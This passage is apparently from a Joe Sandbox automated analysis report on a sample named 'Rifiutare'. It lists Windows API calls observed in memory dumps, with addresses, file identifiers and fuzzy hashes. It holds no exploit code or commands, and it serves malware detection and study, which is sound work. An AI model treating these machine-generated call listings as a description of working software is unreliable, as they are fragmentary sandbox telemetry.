                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 12668dccb2f510dcfae0e78314dd38d5c132425b02e5e3f28bfee29a02298673
                                                                                • Instruction ID: 9d577be507d794dd930cf15ad4ce07d61ee493758a4896cc6783f6b26d566cb2
                                                                                • Opcode Fuzzy Hash: 12668dccb2f510dcfae0e78314dd38d5c132425b02e5e3f28bfee29a02298673
                                                                                • Instruction Fuzzy Hash: 9911B13A200302ABCB159F29DC49E7E77A9EF49750B54402AF902C7264EF319956D791
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ce59cb54b2918c9c495ab01e6fbbfdc380308b2ddee2165d27bb341793fe036
                                                                                • Instruction ID: 8e7bc9a6bdd5d7848812fb27d31421e81fc900b372a62226898865a80a761c9f
                                                                                • Opcode Fuzzy Hash: 7ce59cb54b2918c9c495ab01e6fbbfdc380308b2ddee2165d27bb341793fe036
                                                                                • Instruction Fuzzy Hash: 1F01A2B2209A163EF63126786CC1F6BA70DDF427B8B340325F631911D1EE608D41A570
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00C922C1
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C922D3
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C922E9
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C92304
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 00ca8a8bda5b49f5297994e71e7bbf18e7e2cb9c30ea3556733ebc5593096ee7
                                                                                • Instruction ID: c7e35352ec093c99bfa7681d51b45e3992b7e3085611ce3882738beccc6d093e
                                                                                • Opcode Fuzzy Hash: 00ca8a8bda5b49f5297994e71e7bbf18e7e2cb9c30ea3556733ebc5593096ee7
                                                                                • Instruction Fuzzy Hash: FD11F77A900228FFEF119BA5C985F9DFBB8FB08750F204091EA51B7290D6716F10EB94
                                                                                APIs
                                                                                  • Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2
                                                                                • GetClientRect.USER32(?,?), ref: 00CCA539
                                                                                • GetCursorPos.USER32(?), ref: 00CCA543
                                                                                • ScreenToClient.USER32(?,?), ref: 00CCA54E
                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00CCA582
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 4127811313-0
                                                                                • Opcode ID: 56727a74187a2c6effb2ad1e0054cbbd145c57969004049e73e5fe0095b9841c
                                                                                • Instruction ID: 2656eced1b246351014d64830e6130bbcdbb37911baac74e635bd49f3499505c
                                                                                • Opcode Fuzzy Hash: 56727a74187a2c6effb2ad1e0054cbbd145c57969004049e73e5fe0095b9841c
                                                                                • Instruction Fuzzy Hash: BF115A71A0151EABDB10DF58D889EEE77B8FB04304F004559F912E3250D330EA81DBA2
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9E9D4
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00C9EA07
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C9EA1D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C9EA24
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: 57b370b7be9fed77c0e2daf9a9a422a7f7b46bc50bdc3bcac254ed61c5b598ba
                                                                                • Instruction ID: 446ec018d90d1f893624c2a52fa137ee89d583e204d0cd0bfa0c8f0115947d36
                                                                                • Opcode Fuzzy Hash: 57b370b7be9fed77c0e2daf9a9a422a7f7b46bc50bdc3bcac254ed61c5b598ba
                                                                                • Instruction Fuzzy Hash: 9311A5B6900359BFCB01DFA8DC08B9E7FA9EB45320F044269F825E7390D6748E0497B1
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,?,00C5D419,00000000,00000004,00000000), ref: 00C5D638
                                                                                • GetLastError.KERNEL32 ref: 00C5D644
                                                                                • __dosmaperr.LIBCMT ref: 00C5D64B
                                                                                • ResumeThread.KERNEL32(00000000), ref: 00C5D669
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 173952441-0
                                                                                • Opcode ID: 31d1474af574dadc5d39465c019466374650cb1fae2342e839131c20e22154cd
                                                                                • Instruction ID: 5c150ab7b98c2ab1795e1e3405167f0c978ee76ce6fb00c5c66c6d2fa628fefe
                                                                                • Opcode Fuzzy Hash: 31d1474af574dadc5d39465c019466374650cb1fae2342e839131c20e22154cd
                                                                                • Instruction Fuzzy Hash: 3B012B764003047BDB301BA5CC05F5E7B28DF81332F100214FD2A820D0DF708985D754
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C36DEF
                                                                                • GetStockObject.GDI32(00000011), ref: 00C36E03
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C36E0D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: 65de9fef235038301b61e4b5aee96ee4bd2323abb600dd6d3b684d741f16cc18
                                                                                • Instruction ID: 95cb6b4bc9e7a16e233c3769283f6e13ba2a63c3791947f6d4e44bae838c455c
                                                                                • Opcode Fuzzy Hash: 65de9fef235038301b61e4b5aee96ee4bd2323abb600dd6d3b684d741f16cc18
                                                                                • Instruction Fuzzy Hash: 30116972111648BFEF125F90DC54FEABBA9FF083A4F044115FA1592160C731DD64ABE0
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C310E8,00000000,00000000,?,00C6343A,00C310E8,00000000,00000000,00000000,?,00C636AB,00000006,FlsSetValue), ref: 00C634C5
                                                                                • GetLastError.KERNEL32(?,00C6343A,00C310E8,00000000,00000000,00000000,?,00C636AB,00000006,FlsSetValue,00CD3248,FlsSetValue,00000000,00000364,?,00C63266), ref: 00C634D1
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C6343A,00C310E8,00000000,00000000,00000000,?,00C636AB,00000006,FlsSetValue,00CD3248,FlsSetValue,00000000), ref: 00C634DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 40dd01dccd4e0dcd953cfe13aaae7f4632d86b70a59d2c2cd465841632b15b8f
                                                                                • Instruction ID: 50eaffe6b11575e7b3fc1e0fcb9c856701fde897afd19e2a999d4c022831b02f
                                                                                • Opcode Fuzzy Hash: 40dd01dccd4e0dcd953cfe13aaae7f4632d86b70a59d2c2cd465841632b15b8f
                                                                                • Instruction Fuzzy Hash: E401AC36611262ABC7324B79DC84F6ABF58AF45B617150624F917D7180DB25DE0186E0
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B8E8
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B90D
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B917
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B94A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
                                                                                • Opcode ID: 39cd8ae9876df2b54d7f980a2cc70abf18520f8ecceeb0afeb90cc82c61693a9
                                                                                • Instruction ID: 57d4f18e385e0bf06a97b958baadfeca53befd70b8580e17b20ceae97b10b645
                                                                                • Opcode Fuzzy Hash: 39cd8ae9876df2b54d7f980a2cc70abf18520f8ecceeb0afeb90cc82c61693a9
                                                                                • Instruction Fuzzy Hash: 8C110C71D1052DEBCF009FE9EA4DBEDBB78BF09721F124095DA41B2250CB709A50CB55
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 00CC843B
                                                                                • ScreenToClient.USER32(?,?), ref: 00CC8453
                                                                                • ScreenToClient.USER32(?,?), ref: 00CC8477
                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CC8492
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                • String ID:
                                                                                • API String ID: 357397906-0
                                                                                • Opcode ID: 7ab2424b9987ef96e8c08bcfbad9cf23d7729c595352e3bb223118d34d165ae8
                                                                                • Instruction ID: 5d79dcdd732cc42d4b3d1d0a73c17d1e346ec665bc33e28a09814383f810d8f1
                                                                                • Opcode Fuzzy Hash: 7ab2424b9987ef96e8c08bcfbad9cf23d7729c595352e3bb223118d34d165ae8
                                                                                • Instruction Fuzzy Hash: 7B1112B9D0020AEFDB51DFA8D884AEEBBF9FB08310F108566E915E3210D735AA55CF50
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C935D0
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C935E1
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C935E8
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C935EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: 150cf58f52aaafdb45bf8e759ecaa869a32102567da888c2d99fa4407756878d
                                                                                • Instruction ID: 5fcc8b77489658bb4ed486681b687f51d300d9c2978fe5c10a2483d3ab1e90ca
                                                                                • Opcode Fuzzy Hash: 150cf58f52aaafdb45bf8e759ecaa869a32102567da888c2d99fa4407756878d
                                                                                • Instruction Fuzzy Hash: 61E06D71201224BBDA201B62DC0EFEF7F6CDB46BA1F010025F106D20809AA0CA41C2B0
                                                                                APIs
                                                                                  • Part of subcall function 00C31E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C31EDC
                                                                                  • Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31EEB
                                                                                  • Part of subcall function 00C31E82: BeginPath.GDI32(?), ref: 00C31F02
                                                                                  • Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31F2B
                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CC8E8F
                                                                                • LineTo.GDI32(?,?,?), ref: 00CC8E9C
                                                                                • EndPath.GDI32(?), ref: 00CC8EAC
                                                                                • StrokePath.GDI32(?), ref: 00CC8EBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: de51bd485398dae4eead153a595e20e7af2bdb6c94cfd5bfea5a3d8f39ed5476
                                                                                • Instruction ID: 141d813205c147926a6333308e662b1ab1b19591a59427163886470561eaed1a
                                                                                • Opcode Fuzzy Hash: de51bd485398dae4eead153a595e20e7af2bdb6c94cfd5bfea5a3d8f39ed5476
                                                                                • Instruction Fuzzy Hash: D8F05E3204265ABADB126F58EC0DFDF3F59AF06710F088105FA12611E1C7B55611DFA9
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 00C3210C
                                                                                • SetTextColor.GDI32(?,?), ref: 00C32116
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00C32129
                                                                                • GetStockObject.GDI32(00000005), ref: 00C32131
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObjectStockText
                                                                                • String ID:
                                                                                • API String ID: 4037423528-0
                                                                                • Opcode ID: 95f142900ee0307e8820567ded3920102042317a196c4c9334b0fe702b7ab96b
                                                                                • Instruction ID: 712d96d712ab89fbff17cf0d5cfc162dbfad912c725e76b053b054b79737b4ec
                                                                                • Opcode Fuzzy Hash: 95f142900ee0307e8820567ded3920102042317a196c4c9334b0fe702b7ab96b
                                                                                • Instruction Fuzzy Hash: 75E0ED32240680AEDB215B74EC09FED7B61AB12336F18C229F6BB980E1C7724645AB11
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00C8EA29
                                                                                • GetDC.USER32(00000000), ref: 00C8EA33
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C8EA53
                                                                                • ReleaseDC.USER32(?), ref: 00C8EA74
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 46dfbfc4da0ab02830c4dff2b99b2f572b7c845612f47fa20fa8c75882b04ba2
                                                                                • Instruction ID: 96edf07721109caf23e35b48573af1f0e542df27fa00340944ee9613b7e18fc4
                                                                                • Opcode Fuzzy Hash: 46dfbfc4da0ab02830c4dff2b99b2f572b7c845612f47fa20fa8c75882b04ba2
                                                                                • Instruction Fuzzy Hash: 74E012B5800200EFCB10AFA0D808BADBBB5FB08315F158869F84BE3210CB385A01EF10
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00C8EA3D
                                                                                • GetDC.USER32(00000000), ref: 00C8EA47
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C8EA53
                                                                                • ReleaseDC.USER32(?), ref: 00C8EA74
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 3889ae0249ad481e99e97c544e49f5f894c30f97677ed7b350de4a241795271c
                                                                                • Instruction ID: 81f3bcda36920488438c24c4cc94d834d37e05521b82de4f14aa4c1d931e7243
                                                                                • Opcode Fuzzy Hash: 3889ae0249ad481e99e97c544e49f5f894c30f97677ed7b350de4a241795271c
                                                                                • Instruction Fuzzy Hash: 6EE092B5800204EFCB51AFB4D848B6DBBB5FB48315F158969F94BE3250CB785A01EF10
                                                                                APIs
                                                                                  • Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11
                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00CA57EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Connection_wcslen
                                                                                • String ID: *$LPT
                                                                                • API String ID: 1725874428-3443410124
                                                                                • Opcode ID: 68035735b9fb2cbef9b431c0a162a5f32cc5de15eff1aea4228b39a775165f5b
                                                                                • Instruction ID: e0cea90fd7f6ea89e937ec6a729c83d798e24b1f597184d54408c21546a14520
                                                                                • Opcode Fuzzy Hash: 68035735b9fb2cbef9b431c0a162a5f32cc5de15eff1aea4228b39a775165f5b
                                                                                • Instruction Fuzzy Hash: 74918E75A00605DFCB14CF54C484EAABBF1AF45318F19C099E85AAF3A2D735EE85CB90
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00C5E72D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: 4466499ae5182e97c3e32cee4bf378168ad39dd844474e1f51b8171c165e6194
                                                                                • Instruction ID: 4a04c1adc80b621899e85e9aa8f7fe8e20589dc59a6beaeff3d7c97e5b026672
                                                                                • Opcode Fuzzy Hash: 4466499ae5182e97c3e32cee4bf378168ad39dd844474e1f51b8171c165e6194
